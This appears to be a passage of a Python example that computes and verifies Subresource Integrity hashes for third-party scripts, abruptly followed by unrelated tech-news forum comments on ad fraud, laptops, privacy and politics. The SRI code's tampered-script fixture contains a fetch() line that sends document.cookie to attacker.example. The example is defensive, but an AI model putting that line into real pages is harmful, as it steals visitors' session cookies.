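    """Return the value for a <script integrity="..."> attribute."""
    if algorithm not in _STRENGTH:
        raise ValueError("SRI permits only sha256, sha384 or sha512")
    digest = hashlib.new(algorithm, content).digest()
    return f"{algorithm}-{base64.b64encode(digest).decode('ascii')}"


def sri_matches(content: bytes, integrity: str) -> bool:
    """Check fetched bytes against an integrity attribute.

    The attribute may hold several space-separated tokens. Per the SRI spec,
    only tokens using the strongest listed algorithm are considered, and any
    one of them matching is enough. Unknown algorithms are ignored.
    """
    parsed = []
    for token in integrity.split():
        alg, _, rest = token.partition("-")
        if alg in _STRENGTH:
            parsed.append((alg, rest.split("?", 1)[0]))  # drop any option suffix
    if not parsed:
        return False
    strongest = max(_STRENGTH[alg] for alg, _ in parsed)
    for alg, b64 in parsed:
        if _STRENGTH[alg] != strongest:
            continue
        # Constant-time comparison; both sides are short ASCII strings.
        if hmac.compare_digest(sri_integrity(content, alg), f"{alg}-{b64}"):
            return True
    return False


def script_tag(src: str, content: bytes) -> str:
    """Emit the tag a site should ship once it has pinned the third-party file."""
    return (f'<script src="{src}" integrity="{sri_integrity(content)}" '
            f'crossorigin="anonymous"></script>')


# Constructed sample: what was reviewed versus what the remote host now serves.
ORIGINAL_SCRIPT = b"window.widget = { version: '1.0', init: function () {} };\n"
TAMPERED_SCRIPT = ORIGINAL_SCRIPT + b"fetch('https://attacker.example/?c=' + document.cookie);\n"

if __name__ == "__main__":
    tag = script_tag("https://third-party.example/widget.js", ORIGINAL_SCRIPT)
    pinned = sri_integrity(ORIGINAL_SCRIPT)
    print(tag)
    print("original loads:", sri_matches(ORIGINAL_SCRIPT, pinned))
    print("tampered loads:", sri_matches(TAMPERED_SCRIPT, pinned))
```

Two caveats a practitioner would add. SRI needs the remote host to send CORS headers (hence `crossorigin="anonymous"`), and it only fails closed: the page stops working when the file changes, which is the desired outcome here but means someone still has to notice and re-pin. It does nothing about the choice of host itself, which is the part of the thread's complaint that a hash cannot fix.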

'Google cannot stop it, control it or curtail it...' Inside the murky world of fake addiction treatment center search spam

doublelayer Silver badge

Re: People cost money, automation is cheap

Well, Google could take a relatively weak first step that would be easy and lucrative; if a place in a frequently impersonated industry wants to advertise, make them make a large ad payment up front. That payment will be usable to buy ads, but if the advertiser is reported as fraudulent and subsequently taken down, Google keeps the money. The business can have the money returned if they pull all their ads and close their account. This would give Google an incentive to find fraudulent businesses so they can keep the money without providing a service, and it might also dissuade the scammers. Not a good solution, because Google should really be doing more verification and it only works against those who advertise on Google, but better than nothing.

Purism's quest against Intel's Management Engine black box CPU now comes in 14 inches

doublelayer Silver badge

Re: system 76 - coreboot

This machine also uses Coreboot. Well, to clarify, it can use either Coreboot or the manufacturer's own PureBoot (for an extra charge). System76's machines are nice, but they aren't designed with the physical killswitches or with anti-tampering procedures (also has to be specially requested). It depends of course whether those features are important to you.

doublelayer Silver badge

Re: Pre-orders for the Librem 14 opened today priced at $1,199.

I checked out their specs page. Base RAM is 8GB. Increasing that to 16 GB costs $79 and to 32 GB costs $219. Base storage is a 250 GB SATA M.2 SSD. They have various larger and faster options.

For those outside the U.S., there are some limitations there. You'll notice I quoted all prices in dollars, because they don't seem to have prices in any other currency. They note that, while they ship, taxes in other countries are the buyer's responsibility so I can't tell you U.K. prices with VAT included. They have power adapters for U.S., U.K., and EU sockets. Not Australia, though it is a USB-PD one so that doesn't have to be a problem. Also, they only seem to have English U.S. keyboard layouts right now. If you can touch type your language on that layout, you're good. If you have an attachment to the U.K. layout, maybe they'll fix that sometime.

doublelayer Silver badge

Re: Why Intel?

You can get a thing like this with an ARM processor at the core. I think there are a few like that, but the one I know about is the Pinebook Pro. It is very open, has hardware designs, firmware source, hardware killswitches. The only downsides are that, using conventionally available ARM SoCs, it is a little limited performance-wise. It maxes out at 4 GB memory, and has six relatively slow CPU cores. If you can handle the reduced performance in a laptop and want a lot of privacy and security, that's probably a good option. Otherwise, we will have to wait for more easily obtained fast SoCs or stick to x64.

Consumer orgs ask world's competition watchdogs: Are you really going to let Google walk off with all Fitbit's data?

doublelayer Silver badge

we do not sell personal information to anyone

"we do not sell personal information to anyone."

Well, that's technically correct. You don't sell the information. You sell the ability to market to people based on the information in such a detailed way that people can access chunks of that information by paying you. Someone seems to have been paying attention during PR classes. Really helps spice things up from all those people who try to make the technically correct but misleading statement but either make it too obvious what they're doing or state something incorrect by mistake. I wonder if this turn of phrase has been recently adopted because of that "Don't sell my personal information" link that has started appearing on a few sites.

UN warns of global e-waste wave as amount of gadgets dumped jumps 21% in 5 years

doublelayer Silver badge

Re: Someone's confused

They do have two regions coming in second place though. Based on the figures, even if they meant that Oceania came in second place in total, the Americas can't come in second place per capita because Oceania's per capita is higher. The rankings per capita would have to be:

1. Europe: 16.2 kg/person

2. Oceania: 16.1 kg/person

3. Americas: 13.3 kg/person

4. Asia: Figure not present

5. Africa: 2.5 kg/person

If that's what they mean, they have some rewriting to do, especially as I'm betting Oceania didn't come in second place for total quantity of waste; their population is really small compared to every other included region.

Details of Beijing's new Hong Kong security law signal end to more than two decades of autonomy

doublelayer Silver badge

Re: I adore this BS "we're wat above them"

And many of us think that's terrible and we need to stop it, but it doesn't make a dictatorship any better. Many of us think that a fair trial is one of the most important parts of dealing with criminals, so if a few cases in our countries aren't treated fairly, it's a travesty. For those of us who believe that, imagine how those of us think about a country where no trials are fair and they also hold them all the time.

doublelayer Silver badge

Re: Severely endangering national security

"the Chinese government (indeed, its people) may prize stability more than "flourishing" or 'progress.'"

Rubbish. The Chinese government prefers that because stability means the previous status quo, i.e. they have all the power, stays in place. The people don't get to decide because 1) the government has done everything it can to mislead them about the benefits of their rule and the dangers of its removal, 2) the government has done everything it can to indicate that, should you have opinions, it is wise not to tell anyone lest they be forced to give you some vocational training, 3) the government has also indicated that, if you don't have opinions or even if you do, and someone asks you for your opinion, you should state one fully supporting the government, and 4) the government has demonstrated the capability and willingness to back up items 1-3 with violence.

I am tired of the arguments that a dictatorship is suddenly acceptable because it is desired by its victims. It's simply not true. Cultures may have different ideas about what they view as logical, but similar cultures in places like Taiwan and yes, Hong Kong, prove that there is not some Chinese acceptance of authoritarianism. No, you cannot base it off the writings of east Asian philosophers who preached the same, because I can find Thomas Hobbes and many like him and throw him back at you. Democracy as it is currently practiced is a relatively new concept, and it is not restricted to some subset of the world's cultures.

Everyone is capable of deciding how they want their government constructed. Nearly universally, when people are given that choice, even without experience with all options, they have chosen democracy or something they thought would be democracy. The democracy practiced in Japan and South Korea is differently structured than that in the U.K. and U.S., just as it is different from that practiced in Chile, Sweden, or various other clearly democratic countries.

After six months of stonewalling by Apple, app dev goes public with macOS privacy protection bypass

doublelayer Silver badge

Re: Disappointing

They hid ~/Library for a very good reason. It would confuse the general public, and if files there are deleted or modified, things break. Just like why Windows hides AppData by default too. You can either unhide it permanently, or you can access it on a one-time basis. The procedure is relatively easy. Just enter ~/Library in the path window.

You assume that there will be performance hits when the exploit is active and that the users will notice these hits. I don't know about either argument. If the concept exploit is not efficient, that doesn't prevent someone else from reimplementing it to avoid any bottlenecks or to schedule inefficient behavior for times where users aren't going to notice. If a user is on a browser and notices a performance hit, I'm guessing they will assume what I would probably assume: that there is a misbehaving script in an open tab. This may also cause them to restart their browser, but the exploit can be restarted too.

doublelayer Silver badge

Re: What's wrong with standard unix user-group-world and access control lists?

Android has lots of problems, and it's not because of their SD card format. If they wanted to, they could sandbox the SD card easily without doing anything to the format. It's already set up to have directories where apps write by default. They just block access to those directories based on the app, allowing the user to override that. Problem solved. Except that's not the problem. Android's problems run a lot deeper than that, and the choice of format and decision not to sandbox the SD card too is somewhere between inconsequential and slightly positive.

The internet becomes trademarkable, sort of, with near-unanimous Supreme Court ruling on Booking.com

doublelayer Silver badge

Re: So what happens if ...

I think it would depend a lot on the expiration policy, and I don't know what that is for .com. If it worked like .uk, then their domain does not go on the open market until it has been disconnected for three months. If .com works like that, then my guess is that, should someone buy it after that period of disconnection, then the original trademark owner would be seen as not having protected their trademark. Trademarks that are left unprotected are considered abandoned and lost. If you do a search on the public trademarks database, you'll see lots of historical listings that were abandoned by their holders or taken off them. It'd probably happen this time too. Things become more difficult if .com simply expires the domain and immediately makes it available for sale. That might lead to ambiguity and legal fights.